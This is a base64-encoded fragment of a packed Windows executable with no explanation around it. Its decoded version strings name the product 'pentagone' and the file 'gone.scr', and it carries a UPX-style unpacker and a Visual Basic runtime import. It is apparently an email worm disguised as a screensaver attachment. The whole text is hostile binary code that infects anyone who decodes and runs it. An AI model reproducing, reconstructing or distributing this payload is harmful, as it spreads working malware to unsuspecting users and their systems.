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
5FECAAHzUIPHCP+WIFICAJWKB0cIwHTcifl5Bw+3B0dQR7lXSPKuVf+WJFICAAnAdAeJA4PDBOvY
/5YoUgIAYenb1/3/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANVFCjwA
AAAAAAADAAMAAAAoAACADgAAAGgAAIAQAAAAqAAAgAAAAADVRQo8AAAAAAAAAQAxdQAAQAAAgAAA
AADVRQo8AAAAAAAAAQAAAAAAWAAAAOxQAgCoDgAAsAQAAAAAAAAAAAAA1UUKPAAAAAAAAAEAAQAA
AIAAAIAAAAAA1UUKPAAAAAAAAAEAAAAAAJgAAACYXwIAFAAAALAEAAAAAAAAAAAAANVFCjwAAAAA
AAABAAEAAADAAACAAAAAANVFCjwAAAAAAAABAAkEAADYAAAAsF8CADQCAACwBAAAAAAAADgTAgAo
AAAAMAAAAGAAAAABAAgAAAAAAIAKAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAA
AACAAIAAgIAAAMDAwADA3MAA8MqmANTw/wCx4v8AjtT/AGvG/wBIuP8AJar/AACq/wAAktwAAHq5
AABilgAASnMAADJQANTj/wCxx/8Ajqv/AGuP/wBIc/8AJVf/AABV/wAASdwAAD25AAAxlgAAJXMA
ABlQANTU/wCxsf8Ajo7/AGtr/wBISP8AJSX/AAAA/gAAANwAAAC5AAAAlgAAAHMAAABQAOPU/wDH
sf8Aq47/AI9r/wBzSP8AVyX/AFUA/wBJANwAPQC5ADEAlgAlAHMAGQBQAPDU/wDisf8A1I7/AMZr
/wC4SP8AqiX/AKoA/wCSANwAegC5AGIAlgBKAHMAMgBQAP/U/wD/sf8A/47/AP9r/wD/SP8A/yX/
AP4A/gDcANwAuQC5AJYAlgBzAHMAUABQAP/U8AD/seIA/47UAP9rxgD/SLgA/yWqAP8AqgDcAJIA
uQB6AJYAYgBzAEoAUAAyAP/U4wD/sccA/46rAP9rjwD/SHMA/yVXAP8AVQDcAEkAuQA9AJYAMQBz
ACUAUAAZAP/U1AD/sbEA/46OAP9rawD/SEgA/yUlAP4AAADcAAAAuQAAAJYAAABzAAAAUAAAAP/j
1AD/x7EA/6uOAP+PawD/c0gA/1clAP9VAADcSQAAuT0AAJYxAABzJQAAUBkAAP/w1AD/4rEA/9SO
AP/GawD/uEgA/6olAP+qAADckgAAuXoAAJZiAABzSgAAUDIAAP//1AD//7EA//+OAP//awD//0gA
//8lAP7+AADc3AAAubkAAJaWAABzcwAAUFAAAPD/1ADi/7EA1P+OAMb/awC4/0gAqv8lAKr/AACS
3AAAerkAAGKWAABKcwAAMlAAAOP/1ADH/7EAq/+OAI//awBz/0gAV/8lAFX/AABJ3AAAPbkAADGW
AAAlcwAAGVAAANT/1ACx/7EAjv+OAGv/awBI/0gAJf8lAAD+AAAA3AAAALkAAACWAAAAcwAAAFAA
ANT/4wCx/8cAjv+rAGv/jwBI/3MAJf9XAAD/VQAA3EkAALk9AACWMQAAcyUAAFAZANT/8ACx/+IA
jv/UAGv/xgBI/7gAJf+qAAD/qgAA3JIAALl6AACWYgAAc0oAAFAyANT//wCx//8Ajv//AGv//wBI
//8AJf//AAD+/gAA3NwAALm5AACWlgAAc3MAAFBQAPLy8gDm5uYA2traAM7OzgDCwsIAtra2AKqq
qgCenp4AkpKSAIaGhgB6enoAbm5uAGJiYgBWVlYASkpKAD4+PgAyMjIAJiYmABoaGgAODg4A8Pv/
AKSgoACAgIAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAgo6Og+uNgXWBgYGB9fPz84H19YHz9fXz9fT19fX19YH1aYGB
aWlpdHR0f3kAAAAAgo6Og/iBgYHzjYGBgYEAgYGBgQCB9fX19fPz9fT09PWBdXVpaWl0dHR0bmwA
AAAAdo6OdniAgXXz8YGBgYGB9IH19YGB9fX19YH19PT1gYFpaXVpdWl0dHQEbmwAAAAAdo6OdniM
gXXzjY2BgfX19PQAAPPz9fWBgYGB9fWBgWlpaXVpaWl0dHQEbmwAAAAAdo6OdgnvaYGB84GBgYGB
gfX1gfT19fX1gYH19fWBgYFpaXVpaWl0dHRzbXgAAAAAg4KOdgnvgXWBjY2BgYGB9fX184H19fWB
gYH19YGBgXWBaYFpaWl0dARnbXgAAAAACYOCggntgXWBjY2BgYGB9fX18/T19fWBgYGBgYGBgYGB
gYGBaWl0dAR/bXgAAAAACYOOjnftgXWBjWiB9fX19PT19PX19fWB9YGBgYGBgWlpgXV1aWh0dARm
bHgAAAAAg4OOjgntgIGBgWnz84H18/T19fX19fX1gYGBgYGBgWlpgYF1dHR0dARueGsAAAAACYN2
jmrrgIF1gWmN84H19PX19fX19YGB9YGBgYGBgWmBdYGAdHR0dGdteHgAAAAACQmDgoN474F1dYFp
gYH19fX19fX19fWBgYGBgXWBgWmBdYF0dHR0dGdta3gAAAAACQmDg44J74GBdWmB8/SBgYH19fX1
9fWBgYGBgYGBgWlpdXV0dHR0dGdsd3gAAAAACQl3g4OD64CBgXWBgYGBgfX19fX19fX1gYGBaYGB
gWmBdXR0dHR0dIt4d3gAAAAAhISEg46C94x1gYCNgYGBgfX19fX19YH19YHzgWmBgYGBdXR0dHR0
gO13amsAAAAAhISEhAmDCe2AgXWBgYGB9YGBgfX18/X19YGBgYGBgYGBdHR0BHR0f3lqg2sAAAAA
hISECQmDg3iLgIGBgYGBaWn1gYH19YGB9POB9YGBgWlpdHQEBHSA7gmCCQkAAAAAhISECQkJCXd4
i4CBgYGBgWlp9YH19YH1gfOBgYGBgWlpdARnBHSAeXaCdwkAAAAAhISEhIQJeISEhHmMgYGBgYFp
gYH1gQCBaWlpgYFpaWlpdARndHRneHZqCXcAAAAAeISEhXh4hHh4eHh4eoyBgYGBgYGBgXWBaYGB
aYGBgYGBgAQEdHRtd3Z2CYMAAAAAeHh4hHh4eHh5eHgJa2ztaIGBgYGBgYGBaYGBdXWBgYF0BAR0
dPAJgoKDg4MAAAAAeHh4eHh4eHh5eXh4eHdq6411aYGBgXWBaYFpgWmBgYCAdHR0aOpqjo6DppsA
AAAAeHh4hXh4hHh5eXgJePfq7o2BgYGBaYGBaYGBdYGAgICAdIB/6gmCgnZ2pqYAAAAAeHh4eXh4
eHh5eHh57o2NgY2BgXWBgWmBaYFpdHR0gICAf+0JdnZ2goKCpqYAAAAAeXh4eXh4eHh5en+AgY2N
gYGBgXWBgWlpgYFoaHR0Z21sCQmDg4OCjo6apqYAAAAAeXl5eXl4hHh6gIGBgY2BgYGBgWlpgYFp
gXSAdHQE7neCgoODg4OOjpqbpo4AAAAAeXh5eXh4eHh6gHWBgYGBgYGBaYGBdYFpdHQEBHQEbWqO
gwmDg4OOjqamjo4AAAAAeHh5eXl4eHhtgHWBgYGBgWlpaWlpgXV0dHQEBARua4J2CQmDgoOPjpqO
jo4AAAAAeXh5eXl5eHhtgIGBgYGBgWlpaWlpgXV0dHR0BH9sgoIJCYODgoKPjpqOjnYAAAAAeXl5
eXl5eHh5gHVpgYGBaWlpaYFpdXV0BAR0f213goMJCYODgoKCjo6OjoMAAAAAeXl5eXl4eHhtaHWB
aWmBaWlpaXVpaXQEdHSA8HiCdgkJg4OCgoKDgo6Og4MAAAAAeXl5eXl5eHjtgHV1aWmBaWlpdWlp
aXQEdHRneHZ2dwmDgoKCgoKDgoKCg4QAAAAAeXl5eXl4eHh5jHWBaYFpaWl1dWmBaXR0dATvdnZ3
CYOCg4ODgo6OgoJ2g4QAAAAAeXl5eXl5eHh5jIGBgYGBgYFpaWl0dAQEdGdrjnYJCYODg4OCj4+P
goKDhHgAAAAAeXl5eXl5eXh4i4F1gYGBgYFpgXV0dHR0BGdggoIJCXeDg4OCj4+Oj4N3hHgAAAAA
eXl5eXl5eXh4eYuBdWmBgWlpgWlpdAQEdGdggnYJCYODg4OCgo+OjoMJhIQAAAAAeXl5eXl5eXh4
eHmAdWmBgWlpgWlpdAR0dGd4gmoJd4ODg4OCgoKCgoODd4QAAAAAeXl5eXl5eXl4d3l/dXWBgYFp
aYGBdHR0BGd4dnZ3d3d3g4ODgoKDg4ODg3cAAAAAeXl5eXl5eXl4a3l/dHVpaWlpaWh0dGh0dGZr
dnZ3CQl3d4ODg4ODg4N3g4MAAAAAeW16eXl5eXl4a3h6gHWBdHR0dHR0BAR0aG1qgmoJCQkJd4OD
g4ODg4ODg3cAAAAAeXp6eXl5eXl4eHh5boB1dIAEBARzcwR0f2x2ancJCQl3d4ODg4ODg4MJg3cA
AAAAeXp6eXl5eXl5bHhrbGeAdARzc3Nzc3R/bHd3CQkJCQl3d3eDg4ODg3d3CQkAAAAAbXp6eXl5
eXl5eWx4eHl6f3Nzc3Nzf20Jg3cJCQkJCXd3d3d3d3d3d3d3dwkAAAAAbXp6bXl5eXl5eXl5bHhs
eW1tbXlteXh4eAl4d3eEhIR3hISEhHd3d3d3g4QAAAAAbW16bW15eXl5eXl5bHh5eXh4eHl4eHh4
d3d4CXd3dwmEhAmEhHeEhIQJd4QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAA
AP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA
//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD/
/wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//
AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8A
AAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAA
AAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//yQTAgAAAAEAAQAw
MAAAAQAIAKgOAAAxdfAQAgA0AjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA
vQTv/gAAAQAAAAAAAwAAAAAAAAADAAAAAAAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAEQAAAAA
AFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAA
AAAJBLAElAEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAcAEAAAEAMAA0ADAAOQAw
ADQAQgAwAAAAUAA2AAEAQwBvAG0AbQBlAG4AdABzAAAAUABvAHcAZQByACAAUAB1AGYAZgAgAGcA
aQByAGwAcwAgAHIAdQBsAHoAIQAgACAAOwA+AAAAAAA0ABQAAQBQAHIAbwBkAHUAYwB0AE4AYQBt
AGUAAAAAAHAAZQBuAHQAYQBnAG8AbgBlAAAANAAUAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAA
AAAwAC4AMAAwAC4AMAAwADAAMwAAADgAFAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAA
ADAALgAwADAALgAwADAAMAAzAAAALAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAG8A
bgBlAAAAAAA8ABIAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAZwBvAG4AZQAu
AHMAYwByAAAAAAAAAAAAAAAAAAAAAAA4YgIAIGICAAAAAAAAAAAAAAAAAEViAgAwYgIAAAAAAAAA
AAAAAAAAAAAAAAAAAABSYgIAYGICAHBiAgAAAAAARQIAgAAAAABLRVJORUwzMi5ETEwATVNWQlZN
